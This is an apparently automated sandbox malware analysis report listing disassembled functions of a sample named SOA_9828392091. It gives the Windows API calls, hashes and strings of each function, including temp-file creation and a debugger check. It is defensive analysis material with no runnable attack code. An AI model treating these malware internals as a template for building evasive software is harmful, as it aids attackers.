                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID:
                                      • API String ID: 1552873950-0
                                      • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                      • Instruction ID: 91282ae54ce5661c7216039ff88169899aac7353b61def825cd480642a7d4913
                                      • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                      • Instruction Fuzzy Hash: 1A515CF1A04218AFDF149F64DC81BADBBB9EF48304F1044AEF65DA3251DB716A808F58
                                      Function 0094EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0094EBB2
                                        • Part of subcall function 009351AF: _memset.LIBCMT ref: 0093522F
                                        • Part of subcall function 009351AF: _wcscpy.LIBCMT ref: 00935283
                                        • Part of subcall function 009351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00935293
                                      • KillTimer.USER32(?,00000001,?,?), ref: 0094EC07
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0094EC16
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009A3C88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 6ee9746737516f70e407566919ebd838dccfa6229773d7067697237fefc2e075
                                      • Instruction ID: 3d8607d02c3700732b79748eb44437f98dd3dbb6c8a71931bece26596b2fd2e9
                                      • Opcode Fuzzy Hash: 6ee9746737516f70e407566919ebd838dccfa6229773d7067697237fefc2e075
                                      • Instruction Fuzzy Hash: F721DA709087849FE7329B248C95FE7BBFCAB46318F04448DE6CA56181D7742A84CB91
                                      Function 0094F4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0095395C: __FF_MSGBANNER.LIBCMT ref: 00953973
                                        • Part of subcall function 0095395C: __NMSG_WRITE.LIBCMT ref: 0095397A
                                        • Part of subcall function 0095395C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001), ref: 0095399F
                                      • std::exception::exception.LIBCMT ref: 0094F51E
                                      • __CxxThrowException@8.LIBCMT ref: 0094F533
                                        • Part of subcall function 00956805: RaiseException.KERNEL32(?,?,0000000E,009E6A30,?,?,?,0094F538,0000000E,009E6A30,?,00000001), ref: 00956856
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID: bad allocation
                                      • API String ID: 3902256705-2104205924
                                      • Opcode ID: 47b31ab0ad511d2a556be2699a90bbf4f615ccd9d460fcaddff0af41a507c4d8
                                      • Instruction ID: bd2eeb2c86c89630133cac7442cae6d6b10984194e27456444dfa0817edd5fec
                                      • Opcode Fuzzy Hash: 47b31ab0ad511d2a556be2699a90bbf4f615ccd9d460fcaddff0af41a507c4d8
                                      • Instruction Fuzzy Hash: 33F0AF3110521EA7DB14FF99D921EEEB7ECAF40364F604439FD08A2191DFB09A4887A5
                                      Function 0097C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0097C72F
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0097C746
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: 8493969d1e82c8b03907281049634f088bebb66c6c01128c4abcc511684529e2
                                      • Instruction ID: 456116110b26a8077be234c595d6c85e571b2bfa06c89e63cb92dda28b36688e
                                      • Opcode Fuzzy Hash: 8493969d1e82c8b03907281049634f088bebb66c6c01128c4abcc511684529e2
                                      • Instruction Fuzzy Hash: 84D05E7150030EAFDB10AB90DD0EF8A776C9B00728F0002A07660A50B2EBB0E6998B54
                                      Function 0098F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e99f54a83759205bb0dc008deab831daf3afc12e8663e72724506813ed36de7a
                                      • Instruction ID: 1234db47a0272e7f198a56b91bd2c2286b61f5ad23c58b7aeae43eab2f875881
                                      • Opcode Fuzzy Hash: e99f54a83759205bb0dc008deab831daf3afc12e8663e72724506813ed36de7a
                                      • Instruction Fuzzy Hash: 77F148716083019FCB10EF28C891B5AB7E5BFC8314F14896EF9999B392D735E905CB82
                                      Function 0095395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __FF_MSGBANNER.LIBCMT ref: 00953973
                                        • Part of subcall function 009581C2: __NMSG_WRITE.LIBCMT ref: 009581E9
                                        • Part of subcall function 009581C2: __NMSG_WRITE.LIBCMT ref: 009581F3
                                      • __NMSG_WRITE.LIBCMT ref: 0095397A
                                        • Part of subcall function 0095821F: GetModuleFileNameW.KERNEL32(00000000,009F0312,00000104,00000000,00000001,00000000), ref: 009582B1
                                        • Part of subcall function 0095821F: ___crtMessageBoxW.LIBCMT ref: 0095835F
                                        • Part of subcall function 00951145: ___crtCorExitProcess.LIBCMT ref: 0095114B
                                        • Part of subcall function 00951145: ExitProcess.KERNEL32 ref: 00951154
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • RtlAllocateHeap.NTDLL(01630000,00000000,00000001), ref: 0095399F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                      • String ID:
                                      • API String ID: 1372826849-0
                                      • Opcode ID: 34b89e81e03f79322a954f944bb058b5e1dbef437b9163566e65f41a20e8425f
                                      • Instruction ID: d1b201a85d80edcf6c1b054e276bf68b4826e6546ddc9f6f8657c506d1ef559e
                                      • Opcode Fuzzy Hash: 34b89e81e03f79322a954f944bb058b5e1dbef437b9163566e65f41a20e8425f
                                      • Instruction Fuzzy Hash: 2001D672249601DAE611FB67EC62B2E634C9BC27A2F204025FD01DB292DBF49D4887A0
                                      Function 0097C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0097C385,?,?,?,?,?,00000004), ref: 0097C6F2
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0097C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0097C708
                                      • CloseHandle.KERNEL32(00000000,?,0097C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0097C70F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: dd28be3d33cc38335ea0689d142c2e8b7dea7b75f6e3ccfc57786cc606e9411b
                                      • Instruction ID: 1bb4f8f993cf4dba614cf616f32b2778946fbdbbe469e0719ba83ffbba884082
                                      • Opcode Fuzzy Hash: dd28be3d33cc38335ea0689d142c2e8b7dea7b75f6e3ccfc57786cc606e9411b
                                      • Instruction Fuzzy Hash: 70E08632145214B7D7251B58AC09FCE7B58AB05B70F144210FB14790E1A7B125119798
                                      Function 0097BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0097BB72
                                        • Part of subcall function 00951C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00957A85), ref: 00951CB1
                                        • Part of subcall function 00951C9D: GetLastError.KERNEL32(00000000,?,00957A85), ref: 00951CC3
                                      • _free.LIBCMT ref: 0097BB83
                                      • _free.LIBCMT ref: 0097BB95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                      • Instruction ID: 76d196db597997ce6e124c081c85d2fe8ff94d8cea242e1c99b2d7317564c937
                                      • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                      • Instruction Fuzzy Hash: E7E012A664174186DA24A57AAE48FB313CC4F85352714081EBC9DE7146CF24F84486A8
                                      Function 00932322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 009322A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00932303
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009325A1
                                      • CoInitialize.OLE32(00000000), ref: 00932618
                                      • CloseHandle.KERNEL32(00000000), ref: 009A503A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                      • String ID:
                                      • API String ID: 458326420-0
                                      • Opcode ID: 5b453c955799e081302fd8c84cfd22b7ba56df1abd7ad4729b53657d402d6c2a
                                      • Instruction ID: 628ce7e41afee68e762eaee0b3efc0855e6a60b23d9e033004214d0f0f4d84f1
                                      • Opcode Fuzzy Hash: 5b453c955799e081302fd8c84cfd22b7ba56df1abd7ad4729b53657d402d6c2a
                                      • Instruction Fuzzy Hash: 9B71B1B4929385CBC714DF9BA9915B5BBE4FBA8358790422EE12AC7371CB714400EFD4
                                      Function 009340E5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 009A3725
                                        • Part of subcall function 0093660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009353B1,?,?,009361FF,?,00000000,00000001,00000000), ref: 0093662F
                                        • Part of subcall function 009340A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009340C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: NamePath$FullLong_memset
                                      • String ID: X
                                      • API String ID: 3051022977-3081909835
                                      • Opcode ID: 6060d1d0b4d173f882a1ddc58ac315bc7bb2a861d4e82d5f9e1c784dd8511f7c
                                      • Instruction ID: 7f63cb0a4f62ea6948550803620a0354996435cef9581429d373dd8810173cb9
                                      • Opcode Fuzzy Hash: 6060d1d0b4d173f882a1ddc58ac315bc7bb2a861d4e82d5f9e1c784dd8511f7c
                                      • Instruction Fuzzy Hash: 5321B771A14298AFCF11DFD4D845BEEBBFC9F89304F008059E505E7241DBB46A898FA5
                                      Function 0097BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID: EA06
                                      • API String ID: 2638373210-3962188686
                                      • Opcode ID: f3f9e3635da37ef7c752760c42503ac58e08c7a9769bdfba63715dd31bf1594b
                                      • Instruction ID: e84c354462d33eb994152e67cf304325293a198320747f37ec8646a1591e97c0
                                      • Opcode Fuzzy Hash: f3f9e3635da37ef7c752760c42503ac58e08c7a9769bdfba63715dd31bf1594b
                                      • Instruction Fuzzy Hash: 19012872904218BEDB29C7A9CC16FFEBBF89B05301F00855AF593D2181E5B8E7088B60
                                      Function 00933A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • 74A3C8D0.UXTHEME ref: 00933A73
                                        • Part of subcall function 00951405: __lock.LIBCMT ref: 0095140B
                                        • Part of subcall function 00933ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00933AF3
                                        • Part of subcall function 00933ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00933B08
                                        • Part of subcall function 00933D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00933AA3,?), ref: 00933D45
                                        • Part of subcall function 00933D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00933AA3,?), ref: 00933D57
                                        • Part of subcall function 00933D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009F1148,009F1130,?,?,?,?,00933AA3,?), ref: 00933DC8
                                        • Part of subcall function 00933D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00933AA3,?), ref: 00933E48
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00933AB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                      • String ID:
                                      • API String ID: 3809921791-0
                                      • Opcode ID: 243b86d41ab6af1268a19567031a52e94f45041d4606673a9d129eb8e29457d2
                                      • Instruction ID: 7414c80b4d32a4bf4069599662622d11ba6ffe9adb5f7f61945c5944e3924d66
                                      • Opcode Fuzzy Hash: 243b86d41ab6af1268a19567031a52e94f45041d4606673a9d129eb8e29457d2
                                      • Instruction Fuzzy Hash: 08116A7191C3419BC300EF6AE845A2ABBE8EBD4710F00891EF485872A1DB709584DF92
                                      Function 0095E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___lock_fhandle.LIBCMT ref: 0095EA29
                                      • __close_nolock.LIBCMT ref: 0095EA42
                                        • Part of subcall function 00957BDA: __getptd_noexit.LIBCMT ref: 00957BDA
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                      • String ID:
                                      • API String ID: 1046115767-0
                                      • Opcode ID: ecf5a1728edaf070cb6aea6ed1b418fa5573b15f18d8693f0b2ddff4273d3f18
                                      • Instruction ID: 7448f9f9ff59d9e643c4813f1c5861c394e67d21e49fb52901edf056e7b3af09
                                      • Opcode Fuzzy Hash: ecf5a1728edaf070cb6aea6ed1b418fa5573b15f18d8693f0b2ddff4273d3f18
                                      • Instruction Fuzzy Hash: 6B1173728096508AE716FFB6D8413587A616FC2333F264740EC605B2E3C7B58E4897A5
                                      Function 00953839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __lock_file_memset
                                      • String ID:
                                      • API String ID: 26237723-0
                                      • Opcode ID: 5832c307d3cf45c64f61f39191c628871c2d18a290f0789064c33eeca3f822b2
                                      • Instruction ID: 1c00a2d96097f2765e5adea79feaf458bb3290836601b7d87993b0e048c18e56
                                      • Opcode Fuzzy Hash: 5832c307d3cf45c64f61f39191c628871c2d18a290f0789064c33eeca3f822b2
                                      • Instruction Fuzzy Hash: 8C017571C01209AACF16EFA78C0269E7B65AFC0362F148619FD1457161D7318B69DB91
                                      Function 009535E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • __lock_file.LIBCMT ref: 00953629
                                        • Part of subcall function 00954E1C: __lock.LIBCMT ref: 00954E3F
                                      • __fclose_nolock.LIBCMT ref: 00953634
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
